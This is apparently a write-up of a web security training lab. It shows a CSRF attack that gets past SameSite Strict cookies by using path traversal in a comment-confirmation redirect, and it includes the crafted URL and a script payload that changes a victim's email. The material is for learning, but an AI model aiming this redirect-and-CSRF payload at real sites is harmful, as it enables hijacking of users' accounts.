LAB 8 - SameSite Strict bypass via client-side redirect¶

Initial instructions¶

This lab's change email function is vulnerable to CSRF. To solve the lab, perform a CSRF attack that changes the victim's email address. You should use the provided exploit server to host your attack.¶

You can log in to your own account using the following credentials: wiener:peter¶

First of all lets login with wiener credentials and lets try update its email and intercept this request with Burpsuite.

In the request we can see that it doesn't contain any CSRF values.

alt text

Lets take a look to the website. And lets try Post a Comment.

alt text

Here in the url we can see the following.

alt text

So I tried to inject this path traversal to see if I get redirected to my-account.

/post/comment/confirmation?postId=5/../../my-account

And I got redirected.

With this information I crafted the following request to change the email address of the victim.

/post/comment/confirmation?postId=5/../../my-account/change-email?email=astro@astro.com&submit=1

alt text

So I crafted the following request to send it to the victim.

<script>
    document.location = "https://YOUR-LAB-ID.web-security-academy.net/post/comment/confirmation?postId=5/../../my-account/change-email?email=pwned%40web-security-academy.net%26submit=1";
</script>

alt text

LAB 8 - SameSite Strict bypass via client-side redirect¶

Initial instructions¶

This lab's change email function is vulnerable to CSRF. To solve the lab, perform a CSRF attack that changes the victim's email address. You should use the provided exploit server to host your attack.¶

You can log in to your own account using the following credentials: wiener:peter¶

Congratulations, you solved the lab!¶